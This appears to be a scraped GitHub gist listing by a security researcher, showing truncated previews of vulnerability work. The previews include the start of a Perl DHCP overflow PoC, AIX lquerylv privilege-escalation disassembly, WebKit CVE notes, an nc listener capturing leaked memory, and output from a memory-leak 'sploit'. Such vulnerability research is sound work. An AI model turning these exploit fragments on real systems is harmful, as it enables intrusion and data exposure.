Tim Brown timb-machine
timb-machine
/ BB10 accessible via usb0 on 169.254.x.x
Created
September 4, 2017 14:16
BB10 accessible via usb0 on 169.254.x.x
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| + usb0 IPv6 Invoke_AD4E4603568803A4 _bp2p._tcp local | |
| + usb0 IPv6 Friendly_F034C06D29A99B20_0AB96FC3A2E87129 _bp2p._tcp local | |
| + usb0 IPv4 Invoke_AD4E4603568803A4 _bp2p._tcp local | |
| + usb0 IPv4 Friendly_F034C06D29A99B20_0AB96FC3A2E87129 _bp2p._tcp local | |
| + usb0 IPv6 24EF7DCD11803ADA9573A4E61C4C02 _tunnel._tcp local | |
| + usb0 IPv4 24EF7DCD11803ADA9573A4E61C4C02 _tunnel._tcp local |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/perl | |
| # largely purloined from http://www.perlmonks.org/?node_id=1093916 as my PoC for the old options overflow proved too messy^wPerlish to rework - [machine] | |
| use strict; | |
| use IO::Socket; | |
| use Net::DHCP::Packet; | |
| use Net::DHCP::Constants; | |
| my $serveripaddress = "10.10.10.1"; |
timb-machine
/ no-unqualified-linker-paths.diff.txt example 2
Created
September 4, 2017 13:46
no-unqualified-linker-paths.diff.txt example 2
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ LD_LIBRARY_PATH=unqualified:/qualified: SLEEP=0 ../glibc-2.19/build-tree/amd64-libc/elf/ld.so ./test-dlopen-LD_LIBRARY_PATH | |
| 10030: [+] operating on non setuid binary | |
| 10030: [+] being opened via LD_LIBRARY_PATH | |
| 10030: [+] not marked insecure=unqualified/ | |
| 10030: [+] not fully qualified, marking insecure=unqualified/ (via LD_LIBRARY_PATH) | |
| 10030: [+] operating on non setuid binary | |
| 10030: [+] being opened via LD_LIBRARY_PATH | |
| 10030: [+] not marked insecure=unqualified/ | |
| 10030: [+] not fully qualified, marking insecure=unqualified/ (via LD_LIBRARY_PATH) | |
| 10030: [+] operating on non setuid binary |
timb-machine
/ CVE-2010-4577 & CVE-2010-0046 WebKit type confusion
Created
September 4, 2017 04:13
CVE-2010-4577 & CVE-2010-0046 WebKit type confusion
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CVE-2010-4577 | |
| Red Hat - https://bugs.webkit.org/show_bug.cgi?id=49883 / http://trac.webkit.org/changeset/72685 | |
| Bug report inaccessible but changeset: | |
| CSSParserValueList* args = val->function->args.get(); | |
| 3632 3632 if (args && args->size() == 1) { | |
| 3633 if (equalIgnoringCase(val->function->name, "local(") && !expectComma) { | |
| 3633 if (equalIgnoringCase(val->function->name, "local(") && !expectComma && (args->current()->unit == CSSPrimitiveValue::CSS_STRING || args->current()->unit == CSSPrimitiveValue::CSS_IDENT)) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| BINFILENAME="${1}" | |
| tempfilename="`tempfile`" | |
| echo "set pagination off" > "${tempfilename}" | |
| # | grep ":$" | grep -v "\." | cut -f 2 -d "<" | cut -f 1 -d ">" | cut -f 1 -d "@" | |
| # | grep "@plt" | cut -f 2 -d "<" | cut -f 1 -d "@" | |
| objdump -D "${BINFILENAME}" | grep ":$" | grep -v "\." | cut -f 2 -d "<" | cut -f 1 -d ">" | cut -f 1 -d "@" | sort | uniq | while read line^M | |
| do |
timb-machine
/ CVE-2014-8904 AIX lquerylv EoP
Created
September 4, 2017 04:01
CVE-2014-8904 AIX lquerylv EoP
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .text:10000354 .using unk_30000BB4, %r31 | |
| .text:10000354 stw %r3, 0x110+var_28(%sp) | |
| .text:10000358 addi %r3, %r31, 0x48C # a_dbgcmd_lquery # "_DBGCMD_LQUERYLV" | |
| .text:1000035C bl .getenv | |
| .text:10000360 lwz %rtoc, 0x110+saved_toc(%sp) | |
| .text:10000364 lwz %r29, off_30001568 # dword_300015E4 | |
| .text:10000368 .using dword_300015E4, %r29 | |
| .text:10000368 cmpwi %r3, 0 | |
| .text:1000036C bne loc_100006D0 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FreeBSD 9.2-RC1: | |
| $ nc -n -vv -l -p 9090 | hexdump -C | |
| listening on [any] 9090 ... | |
| connect to [192.168.x.y] from (UNKNOWN) [192.168.124.194] 52680 | |
| 00000000 68 65 6c 6c 6f 0a 00 00 00 00 00 00 00 00 00 00 |hello...........| | |
| sent 0, rcvd 30 | |
| 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |..............| | |
| 0000001e |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ sudo getcap `which ping` | |
| sudo getcap `which ping` | |
| [sudo] password for xx: | |
| /bin/ping = cap_net_raw+ep |
timb-machine
/ UNIXSocketScanner.pl example
Created
September 4, 2017 03:43
UNIXSocketScanner.pl example
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ find / -type s | ./UNIXSocketScanner.pl -x 5 -p ./probes -n /usr/share/nmap/nmap-service-probes | |
| ... | |
| /tmp/akonadi-xxx.HoHuFd/mysql.socket | |
| + matches nmap-response-mysql | |
| + matches nmap-probe-NULL | |
| /tmp/akonadi-xxx.HoHuFd/akonadiserver.socket | |
| /tmp/ksocket-xxx/klauncherMT5682.slave-socket | |
| /tmp/ksocket-xxx/kio_http_cache_cleaner | |
| /tmp/ksocket-xxx/kdeinit4__0 | |
| /tmp/.ICE-unix/5725 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ ./sploit 2000 $$ | |
| maximumleak: 2000 | |
| target: 14876824 | |
| ... ...........n .......bash.......4.....Sq...NQ...@..../usr/lib/libiconv.a.shr4.o.....4.....R........> ..../usr/lib/libi18n.a.shr.o.......0.....R....-u.RQ(..#4/usr/lib/nls/loc/en_US.....4.....Q.....>..f....(/usr/lib/libcrypt.a.shr.o......0.....f.......5p...../usr/lib/libdl.a.shr.o.....8...........P.e.0..HV/usr/lib/libcurses.a.shr42.o.utd...<.....M.......)....?./usr/lib/libpthreads.a.shr_xpg5.o......<.....Q....1_.$....! /usr/lib/libpthreads.a.shr_comm.o.ip.............=...x....eh/usr/lib/threads/libc.a.shr.o...rc.teboot.d........2.......S.(..rc.trustedboot.............3.......r. ..rc.wpars...........4......... ..resolv.conf........5......... ..route.....[`.......6.......-....rpc........7......... ..rpc.pcnfsd.c.......8.......D....rpm........9......... ..rsvpd.conf.........:......... ..screenrc...........;.......P. ..securetcpip........<......... ..security...........=.......v. ..sendmail.cf........>......... ..services...........?........ |